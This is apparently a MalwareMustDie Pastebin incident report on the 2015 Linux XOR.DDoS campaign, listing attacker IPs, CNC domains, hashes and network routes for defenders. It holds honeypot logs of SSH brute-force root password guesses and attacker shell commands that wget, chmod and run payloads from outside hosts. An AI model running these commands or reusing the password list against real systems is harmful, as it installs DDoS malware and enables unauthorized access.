Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // ------------------------
- // Background:
- // ------------------------
- XOR.DDOS attack recorded from June 22th 2015 to Sept 15 2015
- By #MalwareMustDie - @unixfreaxjp
- Additional/updates to the XOR.DDOS case reported:
- MMD-0033-2015Linux/XorDDoS infection incident report (CNC: HOSTASA.ORG)
- http://blog.malwaremustdie.org/2015/06/mmd-0033-2015-linuxxorddos-infection_23.html
- MalwareMustDie references on XOR.DDoS:
- http://blog.malwaremustdie.org/2015/07/mmd-0037-2015-bad-shellshock.html
- http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html
- POINT: Hongkong and United States CNC are still actively being used.
- // ------------------------
- // Cummulative attacker IPs:
- // ------------------------
- 43.229.52.79
- 43.229.53.28
- 43.229.53.49
- 43.229.53.63
- 43.229.53.88
- 43.255.188.139
- 43.255.189.16
- // ------------------------
- // Sample brute login used:
- // ------------------------
- 2015-06-22 19:42:27+0900 [ip=43.229.52.79] login attempt [root/1895-June]
- 2015-06-22 19:42:28+0900 [ip=43.229.52.79] login attempt [root/ep.123456]
- 2015-06-22 19:42:29+0900 [ip=43.229.52.79] login attempt [root/otrs12345]
- 2015-06-22 19:42:32+0900 [ip=43.229.52.79] login attempt [root/123ts3321]
- 2015-06-22 19:42:34+0900 [ip=43.229.52.79] login attempt [root/rw.123456]
- 2015-06-22 19:42:35+0900 [ip=43.229.52.79] login attempt [root/audenzio1]
- 2015-06-22 19:42:38+0900 [ip=43.229.52.79] login attempt [root/DROWSS@P1]
- 2015-06-22 19:42:39+0900 [ip=43.229.52.79] login attempt [root/bcampbell]
- 2015-06-22 19:42:40+0900 [ip=43.229.52.79] login attempt [root/cmarshall]
- 2015-06-22 19:42:43+0900 [ip=43.229.52.79] login attempt [root/dragostea]
- 2015-06-22 19:42:44+0900 [ip=43.229.52.79] login attempt [root/rx.123456]
- 2015-06-22 19:42:45+0900 [ip=43.229.52.79] login attempt [root/soigan123]
- 2015-06-22 19:42:48+0900 [ip=43.229.52.79] login attempt [root/adajacobs]
- 2015-06-22 19:42:50+0900 [ip=43.229.52.79] login attempt [root/ta.123456]
- 2015-06-22 19:42:51+0900 [ip=43.229.52.79] login attempt [root/aquilino1]
- 2015-06-22 19:42:54+0900 [ip=43.229.52.79] login attempt [root/root22222]
- 2015-06-22 19:42:55+0900 [ip=43.229.52.79] login attempt [root/0isPLIqsm]
- 2015-06-22 19:42:56+0900 [ip=43.229.52.79] login attempt [root/jmcmurray]
- 2015-06-22 19:42:59+0900 [ip=43.229.52.79] login attempt [root/yr.123456]
- 2015-06-22 19:43:00+0900 [ip=43.229.52.79] login attempt [root/vikiyulia]
- 2015-06-22 19:43:01+0900 [ip=43.229.52.79] login attempt [root/doriana12]
- 2015-06-22 19:43:04+0900 [ip=43.229.52.79] login attempt [root/casper11]
- 2015-06-22 19:43:06+0900 [ip=43.229.52.79] login attempt [root/yb.123456]
- 2015-06-22 19:43:07+0900 [ip=43.229.52.79] login attempt [root/wangyi123]
- 2015-06-22 19:43:10+0900 [ip=43.229.52.79] login attempt [root/uj.123456]
- 2015-06-22 19:43:11+0900 [ip=43.229.52.79] login attempt [root/aavishkar]
- 2015-06-22 19:43:12+0900 [ip=43.229.52.79] login attempt [root/046194575]
- 2015-06-22 19:43:15+0900 [ip=43.229.52.79] login attempt [root/marquardt]
- 2015-06-22 19:43:16+0900 [ip=43.229.52.79] login attempt [root/pavila123]
- 2015-06-22 19:43:17+0900 [ip=43.229.52.79] login attempt [root/io.123456]
- 2015-06-22 19:43:20+0900 [ip=43.229.52.79] login attempt [root/1234%mm&*]
- 2015-06-22 19:43:22+0900 [ip=43.229.52.79] login attempt [root/victoriar]
- 2015-06-22 19:43:23+0900 [ip=43.229.52.79] login attempt [root/in.123456]
- (...)
- 2015-09-01 13:50:34+0900 [ip=43.229.53.28] login attempt [root/!@]
- 2015-09-01 14:24:36+0900 [ip=43.229.53.28] login attempt [root/!@]
- 2015-09-01 14:58:45+0900 [ip=43.229.53.28] login attempt [root/!@]
- 2015-09-01 15:54:43+0900 [ip=43.229.53.28] login attempt [root/!@]
- 2015-09-10 13:29:00+0900 [ip=43.229.53.49] login attempt [root/!@]
- 2015-09-10 14:18:02+0900 [ip=43.229.53.49] login attempt [root/!@]
- 2015-09-11 10:58:51+0900 [ip=43.229.53.49] login attempt [root/!@]
- 2015-09-11 11:41:14+0900 [ip=43.229.53.49] login attempt [root/!@]
- 2015-09-11 12:18:56+0900 [ip=43.229.53.49] login attempt [root/!@]
- 2015-09-14 13:58:40+0900 [ip=43.229.53.49] login attempt [root/!@]
- // ------------------------
- // Payload attacker & payload IP:
- // ------------------------
- 43.229.53.90
- // ------------------------
- // Payload downloaded by attackers log:
- // ------------------------
- 2015-08-09 19:05:49+0900 [ip=43.229.53.88] exec command: #!/bin/sh
- 2015-08-09 19:05:49+0900 [ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- 2015-08-09 19:05:49+0900 [ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
- 2015-08-09 19:05:52+0900 [ip=43.229.53.88] chmod +x h12
- 2015-08-09 19:05:52+0900 [ip=43.229.53.88] ./h12
- 2015-08-25 12:45:48+0900 [ip=43.229.53.90] exec command: #!/bin/sh
- 2015-08-25 12:45:48+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- 2015-08-25 12:45:48+0900 [ip=43.229.53.90] wget h00p://43.229.53.88/abf/h121
- 2015-08-25 12:45:48+0900 [ip=43.229.53.90] chmod +x h121
- 2015-08-25 12:45:48+0900 [ip=43.229.53.90] ./h121
- 2015-08-31 16:29:46+0900 [ip=43.229.53.90] exec command: #!/bin/sh
- 2015-08-31 16:29:46+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- 2015-08-31 16:29:46+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/i324
- 2015-08-31 16:29:46+0900 [ip=43.229.53.90] chmod +x i324
- 2015-08-31 16:29:46+0900 [ip=43.229.53.90] ./i324
- 2015-09-10 13:33:49+0900 [ip=43.229.53.90] exec command: #!/bin/sh
- 2015-09-10 13:33:49+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- 2015-09-10 13:33:49+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/g13e
- 2015-09-10 13:33:49+0900 [ip=43.229.53.90] chmod +x g13e
- 2015-09-10 13:33:49+0900 [ip=43.229.53.90] ./g13e
- 2015-09-14 14:02:02+0900 [ip=43.229.53.90] exec command: #!/bin/sh
- 2015-09-14 14:02:02+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- 2015-09-14 14:02:02+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/f1c3
- 2015-09-14 14:02:02+0900 [ip=43.229.53.90] chmod +x f1c3
- 2015-09-14 14:02:02+0900 [ip=43.229.53.90] ./f1c3
- // ------------------------
- // Sample hashes (uploaded to VT):
- // ------------------------
- 142e14d7872cbd783246d3be0396f3eb3c9fbd2c30d571ff3bd7769e00c08fcd
- 8d25feed690c1381f70018f5b905efbc9d8901098371cdeb8f32aa4d358210c7
- a5afcc42f5eb61dc7992576195f8abb1c519d32d8c788b547d3b634277f16681
- // ------------------------
- // CNC domains, IP, DNS:
- // ------------------------
- aa.hostasa.org 23.234.60.143 // http downloads h00p://aa.hostasa.org/leg.rar (Xor-ed ELF trojan/downloader malware, prev known as "g.rar")
- ns1.hostasa.org 107.160.40.9 // cnc
- ns2.hostasa.org 103.240.140.152 // cnc
- ns3.hostasa.org 103.240.141.54 // cnc
- ns4.hostasa.org 192.126.126.64 // cnc
- ;; AUTHORITY SECTION:
- hostasa.org. 3600 IN NS ns1cnb.domain-resolution.net.
- hostasa.org. 3600 IN NS ns4lny.domain-resolution.net.
- hostasa.org. 3600 IN NS ns3cna.domain-resolution.net.
- hostasa.org. 3600 IN NS ns2dky.domain-resolution.net.
- // ------------------------
- // Infector & CNC IP routes:
- // ------------------------
- 43.229.52.79||63857 | 43.229.52.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
- 43.229.53.28||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
- 43.229.53.49||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
- 43.229.53.63||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
- 43.229.53.88||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
- 43.255.188.139||36351 | 43.255.188.0/24 | SOFTLAYER | US | - | Sex Insex
- 43.255.189.16|| | | | HK | 0451dns.com | Shimizu Hang Road Causeway Bay Hong Kong International
- 23.234.60.143||26484 | 23.234.60.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC
- 107.160.40.9||40676 | 107.160.0.0/16 | AS40676 | US | psychz.net | Psychz Networks
- 103.240.140.152||62466 | 103.240.140.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
- 103.240.141.54||62466 | 103.240.141.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
- 192.126.126.64||26484 | 192.126.126.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC
- // ------------------------
- // Infector & CNC GeoIP
- // ------------------------
- 43.229.52.79, , , Hong Kong, 22.25, 114.1667, AS
- 43.229.53.28, , , Hong Kong, 22.25, 114.1667, AS
- 43.229.53.49, , , Hong Kong, 22.25, 114.1667, AS
- 43.229.53.63, , , Hong Kong, 22.25, 114.1667, AS
- 43.229.53.88, , , Hong Kong, 22.25, 114.1667, AS
- 43.255.188.139, , , Hong Kong, 22.25, 114.1667, AS
- 43.255.189.16, , , Hong Kong, 22.25, 114.1667, AS
- 23.234.60.143, Newark, 19711, United States, 39.7151, -75.7306
- 107.160.40.9, Walnut, 91789, United States, 34.0115, -117.8535
- 103.240.140.152, Central District, , Hong Kong, 22.2833, 114.15
- 103.240.141.54, Central District, , Hong Kong, 22.2833, 114.15, AS
- 192.126.126.64, Los Angeles, 90017, United States, 34.053, -118.2642
- // ------------------------
- // Just some recent PoCs:
- // ------------------------
- TCP MMD-JP.ORG:49214->192.126.126.64:3307 (ESTABLISHED)
- TCP MMD-JP.ORG:44325->107.160.40.9:3307 (ESTABLISHED)
- TCP MMD-JP.ORG:58487->23.234.60.143:http (ESTABLISHED)
- 2015-09-15 06:55:12.954090 IP MMD-JP.ORG.58476 > 23.234.60.143
- http: Flags [P.], seq 1:215, ack 1, win 884, options [nop,nop,TS val 34190894 ecr 2820891477], length 214
- E..6.@.@....nJ...<..l.Ps...J......tk.........#cU
- GET /leg.rar HTTP/1.1
- Accept: */*
- Accept-Language: zh-cn
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
- Host: aa.hostasa.org
- Connection: Keep-Alive
- [...]
- 2015-09-15 06:55:13.121609 IP 23.234.60.143.http > MMD-JP.ORG.58476:
- Flags [.], seq 1:1403, ack 215, win 54, options [nop,nop,TS val 2 820891645 ecr 34190894], length 1402
- E....h@.4.)#..<..nJ..P.lJ...s..i...6........#c.. ..
- HTTP/1.1 200 OK
- Date: Tue, 15 Sep 2015 05:54:14 GMT
- Server: Apache
- Last-Modified: Sun, 07 Dec 2014 08:27:46 GMT
- ETag: "2475-5099c15a16480"
- Accept-Ranges: bytes
- Content-Length: 9333
- Keep-Alive: timeout=5, max=2048
- Connection: Keep-Alive
- Content-Type: application/x-rar-compressed
- /&.{L9R$/8PE .h.pl.~u..qqm....h.{r..v..qop....t.ls.jp..sqv....w.wn.vq..sos
- [...]
- #MalwareMustDie!
- [EOF]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement